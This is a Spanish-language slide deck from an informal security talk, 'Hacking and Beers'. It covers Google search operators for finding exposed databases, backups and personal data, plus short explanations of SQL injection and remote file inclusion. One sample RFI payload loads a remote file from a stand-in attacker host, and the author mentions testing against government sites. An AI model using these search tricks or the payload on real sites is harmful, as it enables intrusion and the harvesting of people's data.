PDF de programación - Hacking and Beers

Hacking And Beers

Por

Arturo zamora
0o_zeus_o0



About

Arturo zamora
Residencia:estado de puebla
Enfoque: vulnerabilidades web
Sitio web: www.securitybroken.com
Works: Bancos, empresas de seguridad
informática e instituciones de gobierno
Familiarizado con ataques web deteccion
y prevención



Hacking And Beers

● Como se relacionan las chelas con el hacking
● Usandolas como herramientas en una noche

de trabajo xD

● En que se parecen las vuln a las cervezas y a

que tipo de cervezas



Hacking en diferentes tipos de

aplicaciones
● Probando bugs en % 0 a % 14

● Cual es el ataque mas efectivo



Google Hacking

Que funciones tenemos???
Algunas funciones ayudan para buscar un archivo en especifi co ,
tipo de extencion , nombre en el
titulo , nombre dentro de la url , algún archivo libre, nombre o
simplemente carpetaque o archivo
dentro de carpeta.
Esto nos ayuda mucho ya que podemos encontrar base de datos
en Access, sql o backups :p,,
también datos de una persona X.



Google Hacking

Las funciones mas comunes serian
Filetype: qué tipo de extensión deseamos buscar (mp3, txt, mdb,
sql, php, asp, etc)
Allintext: nos hace mal fácil buscar una palabra o frase (powered
by **) wii!!
Intitle, Allintitle: podemos buscar un titulo en particular del sitio
( haxorz xD)
Inurl, Allinurl: mi favorito :p nos hace un listado de que archivo
estamos buscando , muy efi caz
para ataques web a cms :p
Site: también efi caz, ejemplo… site: .gov.ar



Google Hacking

Pero no crean que estos son todos, hay otros mas que puede ser
que no me los sepa ya que no soy
un experto en sacar provecho a google
Allinanchor: nos sirve para buscar palabras en especifi co
author: buscamos dependiendo del nombre o mail de la persona
autora :p
Cache: este es mas claro que el agua.. preguntas ¿? xD
ext: es como inurl pero para fi letype :p



Jeopardy google por una chela

● Como podemos sacar una extensa lista de

correos , teléfonos y nombres de personas??

● Como buscar el nombre de un archivo junto

con su extensión

● Que comando en google podemos usar para
ver errores web o contenido de carpetas con
información sensible



Jeopardy Google por una chela

● Que hacemos si encontramos un usuario pero

su contraseña esta encriptada en md5

● A quien le debemos esta gran sabiduría?

● xDDDDD



ATAQUES WEB

● Los ataques web hoy en día son cosa muy

comunes ya que casi la mayoría de sitios
tienen errores , los mas comunes son en los
sitios de gobierno ya que no les dan la
suficiente atención y son los mas codiciados
por los “DEFACERS” o atacantes



ATAQUES WEB

● Tenemos muchos ataques existentes hoy en

día pero uno de los mas comunes que hay son
los sql inyección, este ataque lo que realiza son
peticiones a la base de datos para que nos
muestre información confidencial un ejemplo
seria algo como esto



ATAQUES WEB

● 1 IMG



ATAQUES WEB

● 1 IMG



ATAQUES WEB

● Remote file inclusión nos ayuda a acceder a un
archivo de manera remota mediante un archivo
php con la facilidad de ejecutar comandos via
url, este ataque como su nombre lo dice es
usar un archivo de manera remota ejem

● index.php?1=http://niñomalo.com/sujugete.txt?
● Y nos daría algo asi



ATAQUES WEB



PREGUNTAS???

● QUIEREN SABER MAS SOBRE ATAQUES

WEB? O SOBRE GOOGLE HACKING?



SITIOS USADOS

● http://gdataonline.com/seekhash.php

http://google.com.mx

● Un .gov.ar
● Y otro de mexico

●



Despedida

● Visiten www.securitybroken.com

●

● Y www.diosdelared.com

●

● Sitios que cuentan con contenido original hecho

por sus usuarios



Agradecimientos

● Zer0-zo0rg, Pandora, Murder, hkm, nitrous,

tunich, Iris O. Mi nena mosha